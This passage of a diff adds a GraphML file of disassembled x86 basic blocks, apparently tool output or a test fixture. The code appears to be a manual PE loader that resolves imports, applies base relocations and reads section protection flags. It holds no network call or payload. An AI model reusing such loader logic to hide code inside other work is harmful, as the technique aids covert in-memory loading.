+          <data key="instruction.hex">a900000080</data>
+          <data key="instruction.source">test eax, 0x80000000</data>
+        </node>
+        <node id="block.0x12b7:instruction.0x12bc">
+          <data key="address">0x12bc</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7511</data>
+          <data key="instruction.source">jne 0x12cf</data>
+        </node>
+        <edge source="block.0x12b7:instruction.0x12b7" target="block.0x12b7:instruction.0x12bc"/>
+      </graph>
+    </node>
+    <node id="block.0x12be">
+      <data key="address">0x12be</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12be</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12be:instruction.0x12be">
+          <data key="address">0x12be</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x12be:instruction.0x12c1">
+          <data key="address">0x12c1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c002</data>
+          <data key="instruction.source">add eax, 2</data>
+        </node>
+        <node id="block.0x12be:instruction.0x12c4">
+          <data key="address">0x12c4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x12be:instruction.0x12c5">
+          <data key="address">0x12c5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff75c0</data>
+          <data key="instruction.source">push dword ptr [ebp - 0x40]</data>
+        </node>
+        <node id="block.0x12be:instruction.0x12c8">
+          <data key="address">0x12c8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f8</data>
+          <data key="instruction.source">call dword ptr [ebp - 8]</data>
+        </node>
+        <edge source="block.0x12be:instruction.0x12be" target="block.0x12be:instruction.0x12c1"/>
+        <edge source="block.0x12be:instruction.0x12be" target="block.0x12be:instruction.0x12c4"/>
+        <edge source="block.0x12be:instruction.0x12c1" target="block.0x12be:instruction.0x12c4"/>
+        <edge source="block.0x12be:instruction.0x12c4" target="block.0x12be:instruction.0x12c5"/>
+        <edge source="block.0x12be:instruction.0x12c5" target="block.0x12be:instruction.0x12c8"/>
+      </graph>
+    </node>
+    <node id="block.0x12cb">
+      <data key="address">0x12cb</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12cb</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12cb:instruction.0x12cb">
+          <data key="address">0x12cb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8907</data>
+          <data key="instruction.source">mov dword ptr [edi], eax</data>
+        </node>
+        <node id="block.0x12cb:instruction.0x12cd">
+          <data key="address">0x12cd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb0e</data>
+          <data key="instruction.source">jmp 0x12dd</data>
+        </node>
+        <edge source="block.0x12cb:instruction.0x12cb" target="block.0x12cb:instruction.0x12cd"/>
+      </graph>
+    </node>
+    <node id="block.0x12cf">
+      <data key="address">0x12cf</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12cf</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12cf:instruction.0x12cf">
+          <data key="address">0x12cf</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">25ffff0000</data>
+          <data key="instruction.source">and eax, 0xffff</data>
+        </node>
+        <node id="block.0x12cf:instruction.0x12d4">
+          <data key="address">0x12d4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">50</data>
+          <data key="instruction.source">push eax</data>
+        </node>
+        <node id="block.0x12cf:instruction.0x12d5">
+          <data key="address">0x12d5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff75c0</data>
+          <data key="instruction.source">push dword ptr [ebp - 0x40]</data>
+        </node>
+        <node id="block.0x12cf:instruction.0x12d8">
+          <data key="address">0x12d8</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff55f8</data>
+          <data key="instruction.source">call dword ptr [ebp - 8]</data>
+        </node>
+        <edge source="block.0x12cf:instruction.0x12cf" target="block.0x12cf:instruction.0x12d4"/>
+        <edge source="block.0x12cf:instruction.0x12d4" target="block.0x12cf:instruction.0x12d5"/>
+        <edge source="block.0x12cf:instruction.0x12d5" target="block.0x12cf:instruction.0x12d8"/>
+      </graph>
+    </node>
+    <node id="block.0x12db">
+      <data key="address">0x12db</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12db</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12db:instruction.0x12db">
+          <data key="address">0x12db</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8907</data>
+          <data key="instruction.source">mov dword ptr [edi], eax</data>
+        </node>
+      </graph>
+    </node>
+    <node id="block.0x12dd">
+      <data key="address">0x12dd</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12dd</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12dd:instruction.0x12dd">
+          <data key="address">0x12dd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c604</data>
+          <data key="instruction.source">add esi, 4</data>
+        </node>
+        <node id="block.0x12dd:instruction.0x12e0">
+          <data key="address">0x12e0</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c704</data>
+          <data key="instruction.source">add edi, 4</data>
+        </node>
+        <node id="block.0x12dd:instruction.0x12e3">
+          <data key="address">0x12e3</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebcc</data>
+          <data key="instruction.source">jmp 0x12b1</data>
+        </node>
+        <edge source="block.0x12dd:instruction.0x12dd" target="block.0x12dd:instruction.0x12e0"/>
+        <edge source="block.0x12dd:instruction.0x12e0" target="block.0x12dd:instruction.0x12e3"/>
+      </graph>
+    </node>
+    <node id="block.0x12e5">
+      <data key="address">0x12e5</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12e5</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12e5:instruction.0x12e5">
+          <data key="address">0x12e5</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8345c414</data>
+          <data key="instruction.source">add dword ptr [ebp - 0x3c], 0x14</data>
+        </node>
+        <node id="block.0x12e5:instruction.0x12e9">
+          <data key="address">0x12e9</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">eb99</data>
+          <data key="instruction.source">jmp 0x1284</data>
+        </node>
+        <edge source="block.0x12e5:instruction.0x12e5" target="block.0x12e5:instruction.0x12e9"/>
+      </graph>
+    </node>
+    <node id="block.0x12eb">
+      <data key="address">0x12eb</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x12eb</data>
+        <data key="type">instructions</data>
+        <node id="block.0x12eb:instruction.0x12eb">
+          <data key="address">0x12eb</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55e4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x1c]</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12ee">
+          <data key="address">0x12ee</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b45e8</data>
+          <data key="instruction.source">mov eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12f1">
+          <data key="address">0x12f1</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">2b4234</data>
+          <data key="instruction.source">sub eax, dword ptr [edx + 0x34]</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12f4">
+          <data key="address">0x12f4</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945ec</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x14], eax</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12f7">
+          <data key="address">0x12f7</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b82a0000000</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 0xa0]</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12fd">
+          <data key="address">0x12fd</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x12eb:instruction.0x12ff">
+          <data key="address">0x12ff</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7464</data>
+          <data key="instruction.source">je 0x1365</data>
+        </node>
+        <edge source="block.0x12eb:instruction.0x12eb" target="block.0x12eb:instruction.0x12f1"/>
+        <edge source="block.0x12eb:instruction.0x12eb" target="block.0x12eb:instruction.0x12f7"/>
+        <edge source="block.0x12eb:instruction.0x12ee" target="block.0x12eb:instruction.0x12f1"/>
+        <edge source="block.0x12eb:instruction.0x12f1" target="block.0x12eb:instruction.0x12f4"/>
+        <edge source="block.0x12eb:instruction.0x12f1" target="block.0x12eb:instruction.0x12f7"/>
+        <edge source="block.0x12eb:instruction.0x12f1" target="block.0x12eb:instruction.0x12fd"/>
+        <edge source="block.0x12eb:instruction.0x12f4" target="block.0x12eb:instruction.0x12f7"/>
+        <edge source="block.0x12eb:instruction.0x12f7" target="block.0x12eb:instruction.0x12fd"/>
+        <edge source="block.0x12eb:instruction.0x12fd" target="block.0x12eb:instruction.0x12ff"/>
+      </graph>
+    </node>
+    <node id="block.0x1301">
+      <data key="address">0x1301</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1301</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1301:instruction.0x1301">
+          <data key="address">0x1301</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b8aa4000000</data>
+          <data key="instruction.source">mov ecx, dword ptr [edx + 0xa4]</data>
+        </node>
+        <node id="block.0x1301:instruction.0x1307">
+          <data key="address">0x1307</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c9</data>
+          <data key="instruction.source">test ecx, ecx</data>
+        </node>
+        <node id="block.0x1301:instruction.0x1309">
+          <data key="address">0x1309</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">745a</data>
+          <data key="instruction.source">je 0x1365</data>
+        </node>
+        <edge source="block.0x1301:instruction.0x1301" target="block.0x1301:instruction.0x1307"/>
+        <edge source="block.0x1301:instruction.0x1307" target="block.0x1301:instruction.0x1309"/>
+      </graph>
+    </node>
+    <node id="block.0x130b">
+      <data key="address">0x130b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x130b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x130b:instruction.0x130b">
+          <data key="address">0x130b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x130b:instruction.0x130e">
+          <data key="address">0x130e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x3c], eax</data>
+        </node>
+        <edge source="block.0x130b:instruction.0x130b" target="block.0x130b:instruction.0x130e"/>
+      </graph>
+    </node>
+    <node id="block.0x1311">
+      <data key="address">0x1311</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1311</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1311:instruction.0x1311">
+          <data key="address">0x1311</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55c4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x1311:instruction.0x1314">
+          <data key="address">0x1314</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4204</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 4]</data>
+        </node>
+        <node id="block.0x1311:instruction.0x1317">
+          <data key="address">0x1317</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1311:instruction.0x1319">
+          <data key="address">0x1319</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">744a</data>
+          <data key="instruction.source">je 0x1365</data>
+        </node>
+        <edge source="block.0x1311:instruction.0x1311" target="block.0x1311:instruction.0x1314"/>
+        <edge source="block.0x1311:instruction.0x1314" target="block.0x1311:instruction.0x1317"/>
+        <edge source="block.0x1311:instruction.0x1317" target="block.0x1311:instruction.0x1319"/>
+      </graph>
+    </node>
+    <node id="block.0x131b">
+      <data key="address">0x131b</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x131b</data>
+        <data key="type">instructions</data>
+        <node id="block.0x131b:instruction.0x131b">
+          <data key="address">0x131b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83e808</data>
+          <data key="instruction.source">sub eax, 8</data>
+        </node>
+        <node id="block.0x131b:instruction.0x131e">
+          <data key="address">0x131e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">d1e8</data>
+          <data key="instruction.source">shr eax, 1</data>
+        </node>
+        <node id="block.0x131b:instruction.0x1320">
+          <data key="address">0x1320</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945cc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x34], eax</data>
+        </node>
+        <node id="block.0x131b:instruction.0x1323">
+          <data key="address">0x1323</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b02</data>
+          <data key="instruction.source">mov eax, dword ptr [edx]</data>
+        </node>
+        <node id="block.0x131b:instruction.0x1325">
+          <data key="address">0x1325</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0345e8</data>
+          <data key="instruction.source">add eax, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x131b:instruction.0x1328">
+          <data key="address">0x1328</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945c0</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x40], eax</data>
+        </node>
+        <node id="block.0x131b:instruction.0x132b">
+          <data key="address">0x132b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d5a08</data>
+          <data key="instruction.source">lea ebx, [edx + 8]</data>
+        </node>
+        <edge source="block.0x131b:instruction.0x131b" target="block.0x131b:instruction.0x131e"/>
+        <edge source="block.0x131b:instruction.0x131e" target="block.0x131b:instruction.0x1320"/>
+        <edge source="block.0x131b:instruction.0x131e" target="block.0x131b:instruction.0x1323"/>
+        <edge source="block.0x131b:instruction.0x131e" target="block.0x131b:instruction.0x1325"/>
+        <edge source="block.0x131b:instruction.0x1320" target="block.0x131b:instruction.0x1323"/>
+        <edge source="block.0x131b:instruction.0x1323" target="block.0x131b:instruction.0x1325"/>
+        <edge source="block.0x131b:instruction.0x1323" target="block.0x131b:instruction.0x1328"/>
+        <edge source="block.0x131b:instruction.0x1325" target="block.0x131b:instruction.0x1328"/>
+      </graph>
+    </node>
+    <node id="block.0x132e">
+      <data key="address">0x132e</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x132e</data>
+        <data key="type">instructions</data>
+        <node id="block.0x132e:instruction.0x132e">
+          <data key="address">0x132e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837dcc00</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0x34], 0</data>
+        </node>
+        <node id="block.0x132e:instruction.0x1332">
+          <data key="address">0x1332</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7424</data>
+          <data key="instruction.source">je 0x1358</data>
+        </node>
+        <edge source="block.0x132e:instruction.0x132e" target="block.0x132e:instruction.0x1332"/>
+      </graph>
+    </node>
+    <node id="block.0x1334">
+      <data key="address">0x1334</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1334</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1334:instruction.0x1334">
+          <data key="address">0x1334</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb703</data>
+          <data key="instruction.source">movzx eax, word ptr [ebx]</data>
+        </node>
+        <node id="block.0x1334:instruction.0x1337">
+          <data key="address">0x1337</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">89c1</data>
+          <data key="instruction.source">mov ecx, eax</data>
+        </node>
+        <node id="block.0x1334:instruction.0x1339">
+          <data key="address">0x1339</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1e90c</data>
+          <data key="instruction.source">shr ecx, 0xc</data>
+        </node>
+        <node id="block.0x1334:instruction.0x133c">
+          <data key="address">0x133c</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">25ff0f0000</data>
+          <data key="instruction.source">and eax, 0xfff</data>
+        </node>
+        <node id="block.0x1334:instruction.0x1341">
+          <data key="address">0x1341</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83f903</data>
+          <data key="instruction.source">cmp ecx, 3</data>
+        </node>
+        <node id="block.0x1334:instruction.0x1344">
+          <data key="address">0x1344</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">750a</data>
+          <data key="instruction.source">jne 0x1350</data>
+        </node>
+        <edge source="block.0x1334:instruction.0x1334" target="block.0x1334:instruction.0x1337"/>
+        <edge source="block.0x1334:instruction.0x1334" target="block.0x1334:instruction.0x133c"/>
+        <edge source="block.0x1334:instruction.0x1337" target="block.0x1334:instruction.0x1339"/>
+        <edge source="block.0x1334:instruction.0x1337" target="block.0x1334:instruction.0x133c"/>
+        <edge source="block.0x1334:instruction.0x1339" target="block.0x1334:instruction.0x133c"/>
+        <edge source="block.0x1334:instruction.0x1339" target="block.0x1334:instruction.0x1341"/>
+        <edge source="block.0x1334:instruction.0x133c" target="block.0x1334:instruction.0x1341"/>
+        <edge source="block.0x1334:instruction.0x1341" target="block.0x1334:instruction.0x1344"/>
+      </graph>
+    </node>
+    <node id="block.0x1346">
+      <data key="address">0x1346</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1346</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1346:instruction.0x1346">
+          <data key="address">0x1346</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55c0</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x40]</data>
+        </node>
+        <node id="block.0x1346:instruction.0x1349">
+          <data key="address">0x1349</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c2</data>
+          <data key="instruction.source">add edx, eax</data>
+        </node>
+        <node id="block.0x1346:instruction.0x134b">
+          <data key="address">0x134b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4dec</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x14]</data>
+        </node>
+        <node id="block.0x1346:instruction.0x134e">
+          <data key="address">0x134e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">010a</data>
+          <data key="instruction.source">add dword ptr [edx], ecx</data>
+        </node>
+        <edge source="block.0x1346:instruction.0x1346" target="block.0x1346:instruction.0x1349"/>
+        <edge source="block.0x1346:instruction.0x1346" target="block.0x1346:instruction.0x134e"/>
+        <edge source="block.0x1346:instruction.0x1349" target="block.0x1346:instruction.0x134e"/>
+        <edge source="block.0x1346:instruction.0x134b" target="block.0x1346:instruction.0x134e"/>
+      </graph>
+    </node>
+    <node id="block.0x1350">
+      <data key="address">0x1350</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1350</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1350:instruction.0x1350">
+          <data key="address">0x1350</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83c302</data>
+          <data key="instruction.source">add ebx, 2</data>
+        </node>
+        <node id="block.0x1350:instruction.0x1353">
+          <data key="address">0x1353</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ff4dcc</data>
+          <data key="instruction.source">dec dword ptr [ebp - 0x34]</data>
+        </node>
+        <node id="block.0x1350:instruction.0x1356">
+          <data key="address">0x1356</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebd6</data>
+          <data key="instruction.source">jmp 0x132e</data>
+        </node>
+        <edge source="block.0x1350:instruction.0x1350" target="block.0x1350:instruction.0x1353"/>
+        <edge source="block.0x1350:instruction.0x1353" target="block.0x1350:instruction.0x1356"/>
+      </graph>
+    </node>
+    <node id="block.0x1358">
+      <data key="address">0x1358</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1358</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1358:instruction.0x1358">
+          <data key="address">0x1358</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b55c4</data>
+          <data key="instruction.source">mov edx, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x1358:instruction.0x135b">
+          <data key="address">0x135b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4204</data>
+          <data key="instruction.source">mov eax, dword ptr [edx + 4]</data>
+        </node>
+        <node id="block.0x1358:instruction.0x135e">
+          <data key="address">0x135e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c2</data>
+          <data key="instruction.source">add edx, eax</data>
+        </node>
+        <node id="block.0x1358:instruction.0x1360">
+          <data key="address">0x1360</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8955c4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x3c], edx</data>
+        </node>
+        <node id="block.0x1358:instruction.0x1363">
+          <data key="address">0x1363</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">ebac</data>
+          <data key="instruction.source">jmp 0x1311</data>
+        </node>
+        <edge source="block.0x1358:instruction.0x1358" target="block.0x1358:instruction.0x135b"/>
+        <edge source="block.0x1358:instruction.0x1358" target="block.0x1358:instruction.0x135e"/>
+        <edge source="block.0x1358:instruction.0x1358" target="block.0x1358:instruction.0x1360"/>
+        <edge source="block.0x1358:instruction.0x135b" target="block.0x1358:instruction.0x135e"/>
+        <edge source="block.0x1358:instruction.0x135b" target="block.0x1358:instruction.0x1360"/>
+        <edge source="block.0x1358:instruction.0x135e" target="block.0x1358:instruction.0x1360"/>
+        <edge source="block.0x1358:instruction.0x1360" target="block.0x1358:instruction.0x1363"/>
+      </graph>
+    </node>
+    <node id="block.0x1365">
+      <data key="address">0x1365</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1365</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1365:instruction.0x1365">
+          <data key="address">0x1365</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4de8</data>
+          <data key="instruction.source">mov ecx, dword ptr [ebp - 0x18]</data>
+        </node>
+        <node id="block.0x1365:instruction.0x1368">
+          <data key="address">0x1368</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b413c</data>
+          <data key="instruction.source">mov eax, dword ptr [ecx + 0x3c]</data>
+        </node>
+        <node id="block.0x1365:instruction.0x136b">
+          <data key="address">0x136b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">01c8</data>
+          <data key="instruction.source">add eax, ecx</data>
+        </node>
+        <node id="block.0x1365:instruction.0x136d">
+          <data key="address">0x136d</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945e4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x1c], eax</data>
+        </node>
+        <node id="block.0x1365:instruction.0x1370">
+          <data key="address">0x1370</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74814</data>
+          <data key="instruction.source">movzx ecx, word ptr [eax + 0x14]</data>
+        </node>
+        <node id="block.0x1365:instruction.0x1374">
+          <data key="address">0x1374</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8d4c0818</data>
+          <data key="instruction.source">lea ecx, [eax + ecx + 0x18]</data>
+        </node>
+        <node id="block.0x1365:instruction.0x1378">
+          <data key="address">0x1378</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">894dc4</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x3c], ecx</data>
+        </node>
+        <node id="block.0x1365:instruction.0x137b">
+          <data key="address">0x137b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">0fb74006</data>
+          <data key="instruction.source">movzx eax, word ptr [eax + 6]</data>
+        </node>
+        <node id="block.0x1365:instruction.0x137f">
+          <data key="address">0x137f</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8945cc</data>
+          <data key="instruction.source">mov dword ptr [ebp - 0x34], eax</data>
+        </node>
+        <edge source="block.0x1365:instruction.0x1365" target="block.0x1365:instruction.0x1368"/>
+        <edge source="block.0x1365:instruction.0x1365" target="block.0x1365:instruction.0x136b"/>
+        <edge source="block.0x1365:instruction.0x1365" target="block.0x1365:instruction.0x1370"/>
+        <edge source="block.0x1365:instruction.0x1368" target="block.0x1365:instruction.0x136b"/>
+        <edge source="block.0x1365:instruction.0x1368" target="block.0x1365:instruction.0x136d"/>
+        <edge source="block.0x1365:instruction.0x1368" target="block.0x1365:instruction.0x1370"/>
+        <edge source="block.0x1365:instruction.0x136b" target="block.0x1365:instruction.0x136d"/>
+        <edge source="block.0x1365:instruction.0x136b" target="block.0x1365:instruction.0x1370"/>
+        <edge source="block.0x1365:instruction.0x136b" target="block.0x1365:instruction.0x1374"/>
+        <edge source="block.0x1365:instruction.0x136b" target="block.0x1365:instruction.0x137b"/>
+        <edge source="block.0x1365:instruction.0x136d" target="block.0x1365:instruction.0x1370"/>
+        <edge source="block.0x1365:instruction.0x136d" target="block.0x1365:instruction.0x137b"/>
+        <edge source="block.0x1365:instruction.0x1370" target="block.0x1365:instruction.0x1374"/>
+        <edge source="block.0x1365:instruction.0x1370" target="block.0x1365:instruction.0x1378"/>
+        <edge source="block.0x1365:instruction.0x1370" target="block.0x1365:instruction.0x137b"/>
+        <edge source="block.0x1365:instruction.0x1374" target="block.0x1365:instruction.0x1378"/>
+        <edge source="block.0x1365:instruction.0x1374" target="block.0x1365:instruction.0x137b"/>
+        <edge source="block.0x1365:instruction.0x1378" target="block.0x1365:instruction.0x137b"/>
+        <edge source="block.0x1365:instruction.0x137b" target="block.0x1365:instruction.0x137f"/>
+      </graph>
+    </node>
+    <node id="block.0x1382">
+      <data key="address">0x1382</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1382</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1382:instruction.0x1382">
+          <data key="address">0x1382</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">837dcc00</data>
+          <data key="instruction.source">cmp dword ptr [ebp - 0x34], 0</data>
+        </node>
+        <node id="block.0x1382:instruction.0x1386">
+          <data key="address">0x1386</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">7460</data>
+          <data key="instruction.source">je 0x13e8</data>
+        </node>
+        <edge source="block.0x1382:instruction.0x1382" target="block.0x1382:instruction.0x1386"/>
+      </graph>
+    </node>
+    <node id="block.0x1388">
+      <data key="address">0x1388</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1388</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1388:instruction.0x1388">
+          <data key="address">0x1388</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b5dc4</data>
+          <data key="instruction.source">mov ebx, dword ptr [ebp - 0x3c]</data>
+        </node>
+        <node id="block.0x1388:instruction.0x138b">
+          <data key="address">0x138b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4308</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 8]</data>
+        </node>
+        <node id="block.0x1388:instruction.0x138e">
+          <data key="address">0x138e</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">85c0</data>
+          <data key="instruction.source">test eax, eax</data>
+        </node>
+        <node id="block.0x1388:instruction.0x1390">
+          <data key="address">0x1390</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">744d</data>
+          <data key="instruction.source">je 0x13df</data>
+        </node>
+        <edge source="block.0x1388:instruction.0x1388" target="block.0x1388:instruction.0x138b"/>
+        <edge source="block.0x1388:instruction.0x138b" target="block.0x1388:instruction.0x138e"/>
+        <edge source="block.0x1388:instruction.0x138e" target="block.0x1388:instruction.0x1390"/>
+      </graph>
+    </node>
+    <node id="block.0x1392">
+      <data key="address">0x1392</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x1392</data>
+        <data key="type">instructions</data>
+        <node id="block.0x1392:instruction.0x1392">
+          <data key="address">0x1392</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">8b4324</data>
+          <data key="instruction.source">mov eax, dword ptr [ebx + 0x24]</data>
+        </node>
+        <node id="block.0x1392:instruction.0x1395">
+          <data key="address">0x1395</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">c1e81d</data>
+          <data key="instruction.source">shr eax, 0x1d</data>
+        </node>
+        <node id="block.0x1392:instruction.0x1398">
+          <data key="address">0x1398</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">83e007</data>
+          <data key="instruction.source">and eax, 7</data>
+        </node>
+        <node id="block.0x1392:instruction.0x139b">
+          <data key="address">0x139b</data>
+          <data key="type">instruction</data>
+          <data key="instruction.hex">e9ba000000</data>
+          <data key="instruction.source">jmp 0x145a</data>
+        </node>
+        <edge source="block.0x1392:instruction.0x1392" target="block.0x1392:instruction.0x1395"/>
+        <edge source="block.0x1392:instruction.0x1395" target="block.0x1392:instruction.0x1398"/>
+        <edge source="block.0x1392:instruction.0x1398" target="block.0x1392:instruction.0x139b"/>
+      </graph>
+    </node>
+    <node id="block.0x13a0">
+      <data key="address">0x13a0</data>
+      <data key="type">instructions-graph</data>
+      <graph edgedefault="directed">
+        <data key="address">0x13a0</data>
+        <data key="type">instructions</data>
+        <node id="block.0x13a0:instruction.0x13a0">
